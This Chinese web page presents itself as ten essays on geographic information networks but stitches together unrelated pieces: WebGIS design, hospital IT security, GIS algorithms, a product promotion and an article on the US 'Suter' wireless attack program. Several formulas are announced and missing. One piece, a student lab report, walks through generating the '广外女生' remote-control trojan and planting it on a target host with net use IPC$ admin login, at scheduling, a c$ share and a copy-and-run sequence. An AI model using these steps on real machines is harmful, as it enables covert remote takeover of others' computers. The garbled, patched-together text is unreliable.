地理信息网络

2024-08-03

地理信息网络(精选十篇)

地理信息网络 篇1

1 概述

1.1 分布式计算综述

分布式网络地理信息系统 (简称DWeb GIS) , 是一种基于分布式空间的数据库, 协同分布式的服务器, 能够为Internet的客户提供地理信息服务的一类网络地理信息系统。该分布式网络地理信息系统的基本结构 (见图1所示) 。

1.2 DWeb GIS的主要构造方法

与传统桌面的地理信息系统方法不同, 网络地理信息系统的构造主要是通过网络环境实现地理的应用功能[3], 首先, 这是一个Web的应用程序, 在Web模式中发布地理信息, 一般采用服务器应用程序接口方法、CGI方法、Active X控件、插件和Java Applet方法。这些方法对于传统的网络地理信息系统和分布式的网络地理信息系统是通用的。

1.3 DWeb GIS的组织方法

在80年代的中期, 软件开发主要集中于结构化模块, 该系统主要由功能模块或函数包组成。而到了90年代, 软件开发方法转变为面向对象开发, 但是, 这种开发方法依赖于特定编程语言, 有较高的耦合度, 还需要深入了解类库的结构和宿主语言, 所以, 软件重用的互操作性和可移植性较难。在对象智能化的脚本程序的设计方法的基础上, 引入了“中间件”这种软件开发方法, 在很大程度上提高了软件模块重用性、独立性和聚合性。

1.4 DWeb GIS构造模型

常见的DWeb GIS的结构体系是由数据库、应用服务器和客户端组成的三层结构体系 (见图2所示) 。它把数据库和地理信息系统的应用逻辑分开, 相对于最初的两层结构, 数据库的改变对应用的影响减少了。

2 DWeb GIS系统原型设计与实现

目前为止, 国内还没有成熟的DWeb GIS软件平台, 但是万维网发布和分布式空间数据管理的问题却困扰着国民经济的发展。因此, 基于CORBA分布式地理信息系统原型的实现过程和设计方法, 我国建立一个能够为自己的行业服务的地理信息系统, 以实现各地区、各部门信息的共享[4]。

2.1 设计原则与目标

主要是依赖于DWeb GIS这个平台工具, 设计出通用性系统。设计系统时, 遵守Open GIS互操作标准和CORAB的接口规范, 采用OCRBA计算技术, 建立可扩展的系统结构, 使得Internet网络环境下与用户的交互性增加。

2.2 运行环境

由于DWeb GIS的计算机资源、地理数据资源比一般的都要复杂, 受各种客观的环境限制, 无法在较大环境中去实现原型。所以, 我们采用模拟方式来开发这个实验的系统原型。

2.3 系统原型的结构

DWeb GIS是在网络环境下存在的应用和空间数据的一种集合, 利用多层结构的模型建立系统来动态地断开或建立连接, 在任何地点、任何时间, 用户能够随意应用逻辑并存取数据, 因此不会影响组件的简单或是复杂的修改。

2.4 DWeb GIS的设计过程

通过软件工程的规范来设计该系统的过程, 主要分为系统总体设计、系统需求分析、系统调试和系统详细设计这四个步骤。我们按照需求把该系统分成了四个模块:系统IDL接口定义模块、分布式空间数据库模块、客户端模块和服务器组模块 (见图3所示) 。

3 DWeb GIS原型实现的功能

3.1 DWeb GIS网络监控服务的原理

网络监控服务, 是指在Internet网络环境中, 通过GPS等各种技术对移动目标的状态和位置进行实时监控, 并且通过影像、地图等方式将目标的位置显示在客户端, 构建了一个分布式监控网络, 优化了资源配置, 原理图 (见图4所示) 。

3.2 DWeb GIS的网络监控服务功能

在DWeb GIS中, 可以集成GPS和GIS、RS数据和服务。利用GPS和Web GIS进行网络车辆监控在很多行业如物流、银行、公安等有广阔的应用前景。在物流业, Web GIS和GPS等技术对于提高我国物流业的发展水平, 改善运输资料利用不当、业内沟通不畅、仓库浪费过量等现象有不可估量的作用。

3.3 DWeb GIS的多源的数据集成功能

Internet网络环境下, 对空间信息的要求不仅局限在单一的图像、简单的图形或文本;再者, 迅速发展的网络使得数据的存储与获取不再受到局限。这样数据传输后不会再客户端产生临时文件, 增加了数据的保密性。对于客户端的页面的配置减少了参数设置、界面更简单。

3.4 DWeb GIS的地图投影转换功能

在我国基本比例尺的地形图中, 如果大于等于50万, 采用高斯-克吕格投影;如果小于50万, 采用兰勃特投影, 在海上, 如果小于50万, 采用墨卡托投影, 我国GIS系统中, 要采用同我国的基本比例尺地形图相一致的地图投影系统。在1:400万的中国地图中, 采用横轴墨卡托投影 (TM) , 它的计算方法与高斯克吕格投影相同, 将高斯克吕格投影坐标乘以0.9996即可。在高斯克吕格投影计算中, 根据地理坐标 (L, B) 计算平面直角坐标 (X, Y) 的公式为:

变量的含义是:

B:纬度 (单位:弧度)

L:经差, 即计算点与投影带中央经线之间的经度差 (单位:弧度)

S:从赤道到点 (L, B) 的子午圈的弧长

N:过点 (L, B) 的曲率半径

C:引进的中间变量, 计算公式是:

N的计算公式是:

a, b:地球椭球体的长、短半轴, e称为地球椭球体的第一偏心率。

S的计算公式是:

4 结束语

在综合分析网络地理信息系统发展的基础上, 对分布式网络地理信息系统DWeb GSI作了深入和详细的理论和方法的研究, 将分布式空间数据库的技术和分布式对象计算技术融入了网络地理信息系统中, 建立了基于CORAB的分布式网络地理信息系统的结构模型并且完整实现了一个原型系统。

参考文献

[1]陈能成.基于J2EE的分布式地理信息服务研究[D].武汉:武汉大学, 2003.

[2]黄裕霞.Cliff Kottman, 柯正谊, 等.可互操作的GIS研究[J].中国图象图形学报, 2001 (9) :925-931.

[3]钱贞国.面向互操作的分布式网络地理信息系统研究[D].北京:中国科学院研究生院, 2004.

【企业网络】网络信息安全报告 篇2

一、实验目的及要求

该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。

本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。

二、专周内容

1、安全需求分析

(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:

A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理

(2)解决网络安全问题的一些要求

A、大幅度地提高系统的安全性(重点是可用性和可控性);

B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;

C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;

D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;

E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;

F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;

(3)系统安全目标

A、建立一套完整可行的网络安全与网络管理策略;

B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;

C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;

D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;

E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;

F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;

2、网络拓扑

3、网络安全的基本内容

(1)基本网络命令

A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。

B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:

C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%

(2)操作系统安全

A、屏蔽不需要的服务组件

开始——程序——管理工具——服务 出现以下窗口:

然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”

(3)数据库系统安全

A、使用安全的帐号策略和Windows认证模式

由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。

SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。

Windows认证模式比混合模式更优越,原因在以下:

1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。

2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。

3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。

4)Windows认证意味着你只需要将密码存放在一个地方。

要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装

1.具体操作如下:

第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;

第二步:

在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;

第三步: 在“软件许可协议”对话框,接受协议点击“是”;

第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;

第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;

第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;

第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;

第八步: 单击“下一步”按钮,系统开始复制文件;

第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。

相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。

点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:

网络监控中心:

(5)网络攻击工具:“广外女生”

它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。

主要步骤:首先运行“gwg.exe”,出现如图窗口:

选中“服务端设置”,生成“GDUFS.exe”木马:

然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:

“开始”——“运行”——“cmd”

命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系

命令:net time 191.168.12.38 获取目标主机的时间

命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道

命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:

命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。

三、专周小结:

通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。

网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。

网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。

至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:

1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。

2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。

4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。

医院信息系统网络信息安全研究 篇3

关键词:医院信息系统;安全;数据;网络

中图分类号:TP309 文献标识码:A文章编号:1007-9599 (2011) 07-0000-01

Hospital Information System Network Information Safety Research

Qin Yisi

(Zhanjiang Center People's Hospital,Zhanjiang524037,China)

Abstract:With the deepening of information technology,hospital information system applications are increasingly widespread.Hospitals for all sorts of information networking,sharing,also brought a degree of security for the test.This paper analyzes the characteristics of hospital information system,its data security and confidentiality of information were of technical and management.

Keywords:Hospital information system;Safety;Data;Net

医院信息系统是一个复杂庞大的计算机网络系统,其以医院的局域网为基础依托、以患者为信息采集对象、以财务管理为运转中心,对医院就诊的所有患者进行全面覆盖。医院信息系统包括了医患信息和医院管理等各种信息,对信息的网络安全进行保护,保证其信息的完整性和可靠性,是医院信息系统正常运转的根本条件。因此有必要对医院信息系统的网络数据进行安全管理,避免各种自然和人为因素导致的安全问题,保证整个系统的安全有效。

一、医院信息系统特点分析

医院信息系统的网络结构决定着系统功能性及有效性。系统的各种集散数据、通信和所提供的系统的扩充能力、自我维护、信息服务等都很大程度上依赖与医院信息计算机系统的网络结构。星形拓扑结构有利于信息的集中控制,能避免局部或个体客端机故障影响整个系统的正常工作,因此可以采用以星形拓扑为基础的分层复合型结构的信息系统进行医院数据的全面管理。其次,作为医院信息系统的主要数据管理模式和管理工具,医院的数据库系统是保证医院信息系统完整性和安全性的关键。

一般认为网络安全就是针对黑客、病毒等攻击进行的防御,而实际上对于医院的信息系统而言,网络安全还受到其他很多因素的威胁,比如:网络设计缺陷、用户非法进入、通讯设备损坏等。网络出现故障将造成患者重要信息损坏和财务管理数据丢失,导致医院的正常作业不能开展。因此本文从技术和管理两个层面对医院信息系统的网络安全维护进行了探讨。

二、医院信息系统网络安全的技术实现

网络、应用、数据库和用户这四个方面是建立医院信息系统安全体系的主要组成部分,只有保证了这些结构的安全,才能从基本上实现医院信息系统的网络安全。

首先是确保网络的安全。医院网络安全包括医院内部网络安全和内外网络连接安全,防火墙、通讯安全技术和网络管理工具等是最常用的技术。其次是确保应用系统的安全。计算机的应用系统完整性主要包括数据库系统和硬件、软件的安全防护。可以采用风险评估、病毒防范、安全审计和入侵检测等安全技术对系统的完整性进行保护。其中,网络安全事件的80%是来自于病毒,因此病毒防范是保证系统完整性的主要措施。然后是确保数据库的安全。对处于安全状态的数据库,可以采用预防性技术措施进行防范;对于已发生损坏的数据库,可以采用服务器集群、双机热备、数据转储及磁盘容错等技术进行数据恢复。最后是确保用户账号的安全。采用用户分组、用户认证及唯一识别等技术对医院信息系统的用户账号进行保护。

三、医院信息系统网络安全的管理体系

除了在技术上对医院信息系统的网络安全进行确保,还需要建立完善合理的安全管理体系,更高层次的保证医院所有有用数据的安全。

(一)进行网络的信息管理。作为现代化医院的重要资产,且具有一定的特殊性,医院的所有信息都有必要根据实际情况,对不同类型的信息因地制宜的制定各种合理的管理制度,分类管理,全面统筹。(二)进行网络的系统安全管理。随时关注网络上发布的系统补丁相关信息,及时完善医院信息系统,对需要升级的系统进行更新,通过确保系统的安全达到保护整个医院信息管理安全的目的。(三)进行网络的行为管理。由专门的网络管理人员利用网络管理软件对医院信息系统内的各种操作和网络行为进行实时监控,制定网络行为规范,约束蓄意危害网络安全的行为。(四)进行身份认证与授权管理。通过规定实现身份认证与权限核查,对医院信息系统的用户身份和操作的合法性进行检查验证,从而区分不同用户以及不同级别用户特征,授权进入信息系统。(五)进行网络的风险管理。通过安全风险评估技术,定期研究信息系统存在的缺陷漏洞和面临的威胁风险,对潜在的危害进行及时的预防和补救。(六)进行网络的安全边界管理。现代化医院的信息交流包括其内部信息和内外联系两部分。与外界的联系主要是通过Internet进行,而Internet由于其传播性和共享性,给医院的信息系统带来较大的安全隐患。(七)进行桌面系统安全管理。桌面系统作为用户访问系统的直接入口,用户能够直接接触的资源和信息一般都存放其上,因此对其进行安全管理非常重要。用户可以采用超级兔子魔法设置或Windows优化大师等应用软件对无关操作和非法行为进行限制。(八)进行链路安全管理。针对链路层下层协议的攻击一般是通过破坏链路通信而窃取系统传输的数据信息。因此要对这些破坏和攻击进行防御,医院可以通过加密算法对数据处理过程实施加密,并联合采用数字签名和认证仪器确保医院信息数据的安全。(九)进行病毒防治管理。网络技术和信息技术的不断发展,也滋长了各种病毒的出现。病毒是计算机系统最大的安全隐患,对系统信息的安全造成很大的威胁。(十)进行数据库安全管理。对数据库的安全管理应该配备专人专机,对不同的数据库类型采取不同的使用方式和广利制度,保护医院信息系统的核心安全。(十一)进行灾难恢复与备份管理。百密总有一疏,任何安全防护体系都不肯能完全对病毒进行防杀,因此为了避免数据的损坏和事故的发生,需要制定相应的数据恢复措施,对重要数据进行定期备份。

四、结束语

当今信息化的不断发展给医院的管理和高效运转带来了方便,但同时也带来了挑战。为了维护病人医患信息和医院财务信息,需要从技术和管理上加强对网络的安全工作,需要与时俱进,不断采用新技术,引进新方法,适应社会需求,将医院的信息化建设推向更高平台。

参考文献

[1]尚邦治.医院信息系统安全问题[J].医疗设备信息,2004,9

[2]从卫春.浅谈医院信息系统安全稳定运行[J].医疗装备,2009,15

[3]任忠敏.医院信息系统安全体系的建立[J].医学信息,2004,13

[4]黄慧勇.医院信息系统安全按风险与应对[J].医学信息,2009,15

网络地理信息系统的优化算法研究 篇4

此外一些核心的地图计算算法如:网络集下求两点间最短路径的Dijkstra算法、网格算法、缓冲区搜索算法等也是提高系统性能的关键和核心。在对于以上算法,在系统应用的基础上,优化地图算法提高地图系统性能是本研究的关键之处,也是研究的着力点。

1 最短路径Dijkstra算法的应用研究

Dijkstra算法是典型最短路径算法,用于计算一个节点到其他所有节点的最短路径。主要特点是以起始点为中心向外层扩展,直到扩展到终点为止。Dijkstra算法能得出最短路径的最优解,但由于它遍历计算的节点很多,所以效率低。Dijkstra算法是很有代表性的最短路径算法,在很多专业课程中都作为基本内容有详细的介绍,如数据结构,图论,运筹学等等。Dijkstra一般的表述通常有两种方式,一种用永久和临时标号方式,一种是用OPEN,CLOSE表方式,Drew为了和下面要介绍的A*算法和D*算法表述一致,这里均采用OPEN,CLOSE表的方式。其采用的是贪心法的算法策略。

本实验将在网络环境下实现Dijkstra算法,对某市的道路路况图经过最短路径Dijkstra算法,求两点间的最短路径。下图1是求得的“1”和“2”两点之间的最短路径查询开发实例。对于使用Dijkstra算法进行最短路径的查询问题是解决地理查询点与点、点经过结点到点的最佳算法。它的算法时间复杂度是o(n2),相对于其他最短路径算法的时间复杂度要小的多。此外,当今大多数的地理信息系统开发组件选用的都是Dijkstra算法来解决最短路径的查询,但由于是第三方组件,所以内部的算法都是不对外开放的,即使是开源软件也是如此,但是通过反编译的方法是能够得到编译码,再通过修改再编译一样可以实现算法的进一步优化。

当然最短路径Dijkstra算法适合于更复杂的多点查询,通过以下另外一个实验来论述多点最短路径Dijkstra算法的实现效果,如图2所示:

输入时,将s,t,x,y,z五个点按照1,2,3,4,5起别名,输入格式按照下图例所示当提示Please enter the vertex where Dijkstra algorithm starts:时输入算法的起始点比如计算结果v1v4v2表示从点1到点2经过1,4,2为最短路径。

Dijkstra算法的时间复杂度是o(n2)。优点在于计算量小,缺点是每次只能计算出图G中的一个点到其它点的最短路径,在地理信息计算两点之间的最短路径时得到广泛应用。

2 地图瓦片算法的应用研究

切片算法是在特定范围内的地图图片获得以后将其切成相同大小正方形图片的算法。为描述切片算法,文中作如下约定:

(1)地图的缩放等级总共有N级,分为0至N一1级;

(2)地图瓦片的命名采用包含地图层号和网格坐标的方式,例如“level x_y”,其中level表示地图层号,x和Y分别表示当前瓦片所处的网格坐标的位置。切片算法描述如下:

(1)已知地图的像素坐标范围,当前要切图的地图层号,以及所切地图瓦片的大小;

(2)由公式(2.3)计算当前待切地图所要切成的瓦片矩阵的行数rows和列数cols;

(3)由公式(2.5)、(2.6)计算网格坐标中位于(i,j)的地图瓦片的左上角和右下角的像素坐标;

(4)根据这两点像素坐标在大块地图中提取图片数据;

(5)新建地图瓦片文件(JPEG或PNG格式),其文件名按照level x y的格式命名,将(4)中提取出来的地图数据保存在该文件中;

(6)对地图图片按从左至右、从上到下的顺序执行(3)-(5)的操作,切图完毕。

通过何种途径可以执行上面第4步的操作,大多数高端编程语言的图形处理库都可以非常容易地做到这一点。本实验是基于某市应急指挥的网络地图程序是用J2EE开发的,所以笔者就以Java的图形处理库来实现上面的切图算法。

3 网格算法的应用研究

网格算法的应用在地图搜索点上尤为需要,在地图海量POI兴趣点的搜索上遍历整幅地图是不方便且耗时的。但如果合理应用地图网格算法,把一幅地图划分成有地图索引的分块地图,先搜索到POI点所在的大致地图区域在进一步搜索此块区域的信息,这样遍历的区域和搜索的时间都会大大减少。提高的系统的性能。

以一幅某市海量POI信息点地图为例,对于左图一幅未经网格化的地图进行POI信息点搜索时要遍历整副地图的信息点,但经过网格化后的右图,只需遍历寻找到所处的大致网格,再进行信息点的遍历,所花费的时间要小得多,提高了搜索的算法效率。图3是地图瓦片算法实现代码截图,研究发现,使用网格算法的地图查询要明显优于无网格的查询,对于网格的划分除了空间概念上的划分思想外,对于把空间地图数据转化到属性数据库时,就是索引的概念。通过合理利用数据库的SQL查询语句也是可以提高地图查询的速度和效率。

网格算法按步骤实现:循环GPS点→循环网格→网格内搜索→跨网格搜索→匹配完成;GIS组件编写数据预处理软件:把地图数据的关键字段提取到ORACLE数据表。为今后的结点法软件设计提供数据上的支持。

通过对测试的分析发现,选用网格算法的海量POI信息点查询速度远大于非网格算法的搜索,实验还发现,越是海量大的数据越是能体现出网格算法的这种优越性。同时对于这次的实验心得体会是:理论上的算法运用到实际工程中,会发觉有实际执行的困难之处。当然在如今计算机技术的发展、软硬件成熟的情况下,通过合理利用相应的数据库软件以及相关技术都能加以解决。做为一名软件设计人员与编程人员,在实现系统过程中,会发现有很多情况下系统的效率,是影响软件质量本身一个至关重要的因素。在这种情况下要合理利用各种软硬件技术以及合理的算法思想去尽力改上对我们的Web GIS系统起到POI搜索效率上的提高。

4 缓冲区搜索算法的应用研究

缓冲区搜索算法,首先需要了解缓冲区的概念,它是地理空间目标的一种影响范围或服务范围,具体指在点、线、面实体的周围,自动建立的一定宽度的多边形。数学表达为:Bi=(x:d(xi,Oi)≤R)。即对象Oi的半径为R的缓冲区,为距Oi的距离d小于R的全部点的集合。d一般是最小欧氏距离,但也可是其他定义的距离。注:缓冲区为GIS的基础概念,如需深入了解,建议参考专业书籍,本研究直接取用。

在本实验中,通过一段以建立缓冲区与区域内道路求交的方式,来获得满足查询半径的道路。左图是以某坐标点为圆心建立的查询缓冲区,对所有距离小于圆半径的道路判断满足条件。右图是对判断离坐标点最近的道路判断同样也可以通过缓冲区搜索的算法,判断一个坐标点附近最近的道路时先建立此点的缓冲区,再对这些满足条件的道路求其中的距离最小值。最终获得最近距离的道路。图4是缓冲区搜索算法实现实例截图:

缓冲区搜索算法在地理信息空间几何关系分析中发挥着重要的作用。作为独立的数据层进行叠加分析,可应用到道路、河流、环境污染源、居民点、辐射源等的空间分析,为某种应用目的提供科学依据,另外,结合不同的专业模型,可以在生活、军事、城乡规划等领域发挥重要的作用。

5 小结

本文是介绍地图优化的各种算法包括:最短路径Dijkstra算法、地图瓦片算法、网格算法和缓冲区搜索算法。在开发RIA-Web GIS系统时,合理利用改良这些算法以适应系统的需要是本章的目的和意义。通过一些实例系统研究的实验加以实现,从实际的本质层面上反映出改良这些算法对系统性能的提高。对今后开发地图系统都有了重要的理论依据。

摘要:本文的研究目的是在把WebGIS与RIA技术结合开发的基础上,探求对传统网络地理信息系统性能的优化,提高地图的响应和浏览速度、以及对传统地学算法的优化等。

关键词:地图优化算法,地图缓存,网络地图服务

参考文献

[1]吴信才.地理信息系统的基本技术与发展动态[J].中国地质大学学报,1998,23(04):329-333.

[2]周文生,毛锋,胡鹏.开放式WebGIS的理论与实践[M].北京:科学出版社,2007.

[3]毛锋,沈小华,艾丽双.ArcGIS 8开发与实践[M].北京:科学出版社,2004.

[4]吴秀芹,张洪岩,李瑞改.ArcGIS 9地理信息系统应用与实践[M].北京:清华大学出版社,2007.

[5]邓芳,李新城,朱伟兴.一种新的基于ArcIMS 3.1的WebGIS方案[J].计算机工程,2002,28(10):208-209.

[6]胡亚明,金焱.浅谈WebGIS的结构[J].测绘与空间地理信息,2005,(3):31-58.

瑞频人民舆情网络网络信息中心系统 篇5

2012年,“大数据”(big data)成为企业管理界的热门词汇。《纽约时报》称,“大数据”时代已经降临,在商业、经济及其他领域中,决策将日益基于数据和分析,而非基于经验和直觉。很多学者和企业家也似乎达成共识:未来,数据将会像土地、石油和资本一样,成为经济运行中的根本性资源。由此可见,“大数据战略”在未来企业竞争中占据着核心作用,而作为企业“大数据战略”建设中信息采集的主要部分:网络信息数据采集,则发挥着不可代替的作用。

“大数据”时代已经来临

“大数据”时代特征是三“大”。第一,管理难度大。海量数据的收集、保存、维护、共享及研究等任务,都面临越来越大的挑战。第二,研究价值大。海量的精准数据,辅以信息技术,使对忠实记录现实生产生活的数据进行系统研究以探求背后规律成为可能。第三,对社会影响大。对海量数据的研究,能够从纷繁复杂的元数据中提取信息,进而提炼出有规律的知识,将这些知识普遍应用于经济、政治、社会生活的方方面面,将极大地激发社会生产力,产生革命性的影响。

我国企业发展情况符合“大数据”时代的特点。第一,企业数据量的增长速度大大超过从前。据计世资讯统计,近三四年,中国500强企业的数据总量每半年翻一番,这是以前数十年中国企业信息化发展中绝无仅有的。第二,数据多样化,特别是非结构化数据爆炸式增长。过去三年,非结构化数据复合年增长率超过90%,驱动力主要来自互联网、移动应用、微博、社区网络等新应用,以及平安城市、智慧城市等信息化建设。第三,快速化需求。企业更加需要适应快速变化的市场环境,而且信息技术已经使得全球市场无边界化、无国界化。企业要想在这样的市场中立足,必须利用信息技术快速从海量信息中获得对自身最有价值的信息。第四,数据价值最大化。如何让这些有用的信息给企业或个人带来价值,为企业发展创造一种新的商业模式或者利润增长点,这是“大数据”时代对于数据的核心要求。如互联网行业利用大数据分析网民上网习惯,及时推送各种个性化信息;公共服务行业通过分析视频、音频等信息,进行舆情监测,保障社会安全等。

信息获取与管理成为“大数据战略”建设软肋

“大数据”正以难以想象的速度带来新一轮信息化革命。众多专家学者预测,“大数据”时代,即将带来新的思维变革、商业变革和管理变革。在“大数据战略”构建过程中,如何掌握海量有效数据的企业,如何提升强大数据分析能力成为这一战略建构的关键点。

目前涉及掘金大数据的企业,多是在数据利用上单打独斗,而大数据时代到来的重要标志,应该是海量数据资源的有效整合和数据资源库的出现,以及围绕数据资源库形成的,贯穿于收集、整理、分析、应用整个流程的产业链条。

巧妇难为无米之炊,掘金大数据的首要一点,还是谁拥有更多、更有价值的数据。当前,社交网络、移动互联网、信息化企业都是海量数据的制造者。有数据显示,脸谱公司手中掌握着8.5亿用户,淘宝注册用户超过3.7亿,腾讯的微信用户突破3亿,微博注册用户达5.03亿,这些庞大用户群所提供的数据,正在等待时机释放出巨大商业能量。但是,面对如何更新频繁的海量信息,企业将如何有效、准确和完整的对自身需要的数据进行采集、抓取则是令大多数企业“大数据战略”建设最为头疼的事情。

瑞频人民舆情网络网络信息中心系统打造信息数据集散中心

基于大数据时代,面对海量网络信息数据,企业传统信息采集无法满足“大数据战略”对信息数据需求的背景,公司基于自身强大的信息采集系统研发了网络信息中心系统,帮助企业打造“大数据战略”的信息数据集散中心。

瑞频人民舆情网络网络信息中心系统主要目的是 为大公司大集团的市场部门与公关部门提供一个收集外部信息的平台,包括与本公司相关的信息,与竞争对手相关的信息,行业信息,价格信息,与合作伙伴相关的信息,用户网上反馈的各种信息,科研技术信息等,解决企业信息数据获取面窄、获取量小、获取不准确等问题。同时,该系统 可以做到多人在一个平台上可以快速浏览当日或过去的所有相关信息,实现信息的整合与内部共享,保证决策的协调性。该系统在发挥信息数据集散中心作用的同时,并具有预警功能,可以在某方面的信息一旦出现时迅速通知相关人员。

通过电波瘫痪信息网络 篇6

“舒特”项目以美国“红旗”演习发起人理查德·穆迪·舒特上校的名字命名,这种绝密的攻击手段据说是一种通过无线方式进入对手信息网络、瘫痪对手防空体系的武器系统,作战效益巨大。

“舒特”项目被公开之后很快又悄无声息,致使有人开始质疑它的真实性。但自去年以来的一系列迹象却表明,美军“舒特”项目不仅存在,而且在技、战术方面已经获得长足进展,正在成为战场网络空间一个威力惊人的“潘多拉”魔盒。

是自信满满,还是虚张声势?

去年,多次报道过“舒特”情况的美国《航空周刊与空间技术》杂志高级军事编辑戴维·A·福尔哈姆再次撰文称,“舒特”正在小型化,向隐身无人机和作战飞机上改装。

同年7月,《华尔街日报》报道,“美国拥有了能遏制敌空中和海上防御的网络武器。美军正在加快开展网络战培训工作,积极为一个新兴的网络战场可能出现的冲突做准备。空军军械学院负责部分网络战培训工作,其培训项目中包括如何侵入敌防空系统等无线网络战攻击技术培训课程。”

结合以前媒体关于美军在伊拉克、利比亚战场上使用“舒特”控制对手网络的报道,种种情况表明,美军通过无线攻击渗透对手战场信息网络的技术不仅存在,而且已经形成了作战能力。去年,美国空军参谋长诺顿·施瓦茨上将在一次会议上的讲话也证实了这一点,他说,空军正在研究“用赛博方式来击败飞机”。

有人分析认为,最近美军关于“舒特”的报道又见诸报端,说明美军对网络空间作战的能力正日益自信,这其中也有威慑他国的味道。

长期潜于水下,不断更换“马甲”

2001年,“舒特”项目被热炒一段时间后突然匿迹,现在看来,报道越来越少的原因,不是美军“舒特”项目被终止,而是受到了更大的重视。

业内人士都很清楚,无线网络空间的对抗非常敏感,没有人愿意“招摇”而引来众多竞争对手,而且网络攻击所利用的网络漏洞大都是一次性资源,一旦某种特定的攻击方法被识破,以后就很难管用。因此,作为无线网络攻击能力代名词的“舒特”项目不常见了。其实,它只是换了“马甲”,隐藏在美国国防财政预算等各类重要文件中。另外,在美国国防部和军队的一些文献中,也经常可以发现与无线网络攻击系统运用相关联的词语。

